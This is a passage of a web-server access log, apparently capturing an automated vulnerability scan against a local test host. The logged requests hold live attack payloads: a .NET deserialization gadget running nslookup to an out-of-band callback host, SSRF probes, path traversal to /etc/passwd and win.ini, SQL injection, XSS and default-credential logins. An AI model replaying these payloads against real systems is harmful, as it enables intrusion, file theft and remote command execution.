}}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/subscriptions HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/var/www/html/index.html HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /auth/admin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /QH.aspx?responderId=ResourceNewResponder&action=download&fileName=.%2fQH.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /static/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"\x0D\x0A\x0D\x0A \x0D\x0A foo\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A 2\x0D\x0A \x0D\x0A <_comparison z:Id=\x224\x22 z:FactoryType=\x22a:DelegateSerializationHolder\x22 z:Type=\x22System.DelegateSerializationHolder\x22 z:Assembly=\x220\x22\x0D\x0A xmlns=\x22http://schemas.datacontract.org/2004/07/System.Collections.Generic\x22\x0D\x0A xmlns:a=\x22http://schemas.datacontract.org/2004/07/System\x22>\x0D\x0A \x0D\x0A mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A Compare\x0D\x0A \x0D\x0A \x0D\x0A System.String\x0D\x0A System.Comparison`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]\x0D\x0A \x0D\x0A Start\x0D\x0A \x0D\x0A System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\x0D\x0A System.Diagnostics.Process\x0D\x0A System.Func`3[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A System.Diagnostics.Process Start(System.String, System.String)\x0D\x0A System.Diagnostics.Process Start(System.String, System.String)\x0D\x0A 8\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A Int32 Compare(System.String, System.String)\x0D\x0A System.Int32 Compare(System.String, System.String)\x0D\x0A 8\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A 2\x0D\x0A \x0D\x0A /c nslookup c9v8gvgsmpv8bafg0t00fq9hgd6u4wd69.oast.pro\x0D\x0A cmd\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /sitecore/shell/ClientBin/Reporting/Report.ashx HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /UI HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/api/latest/serverInfo HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"username=root&password=admin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/luci/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.json/FNZ.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /htmltopdf/downfile.php?filename=/windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /examples/servlets/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hue/accounts/login?next=/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //netcore_get.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"ip=c9v8gvgsmpv8bafg0t005mxrhcapsm16z.oast.pro:80&argu=/","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /php/query.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ui/login.php?user=admin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /updating.jsp?url=https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sso/XUI HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ui/login/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_communitypolls&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.json/FNZ.png HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /examples/jsp/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"getpwd=WorldFilledWithLove","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php/bbs/index/download?url=/etc/passwd&name=1.txt&local=1 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hue/accounts/login?next=/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /glpi/plugins/barcode/front/send.php?file=../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /examples/jsp/snp/snoop.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /my-account/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /adjuncts/3a890183/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.action?redirect:http://www.example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sso/UI HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-login.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=MEC-ix&tab=MEC-export&mec-ix-action=export-events&format=csv HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.json/FNZ.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /irj/go/km/navigation/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /examples/websocket/index.xhtml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"csrfmiddlewaretoken={{csrfmiddlewaretoken}}&username=admin&password=admin&next=%2F","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /hue/accounts/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /crx/packmgr/list.jsp;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0aa.css?_dc=1615863080856&_charset_=utf-8&includeVersions=true HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_fabrik&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sso/UI/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /backup2.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /en-US/account/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.children.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /changePassword?username=administrator HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..;/examples/servlets/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"csrfmiddlewaretoken={{csrfmiddlewaretoken}}&username=hue&password=hue&next=%2F","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /hue/accounts/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=cf7skins&tab=%27%3E%3Cimg+src+onerror%3Dalert%28document.domain%29%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Images/Remote?imageUrl=http://c9v8gvgsmpv8bafg0t00tfjygpsbbwkca.oast.pro HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /content/..;/crx/packmgr/list.jsp;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0aa.css?_dc=1615863080856&_charset_=utf-8&includeVersions=true HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /opensso/UI/Login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /backup2.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger_doc.json HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"4.999","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"{\x22metadata\x22:{\x22order_id\x22:\x221 and updatexml(1,concat(0x7e,(SELECT md5(202072102)),0x7e),1)\x22},\x22status\x22:2}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /upload/index.php?route=extension/payment/divido/update HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/install.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.children.1.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 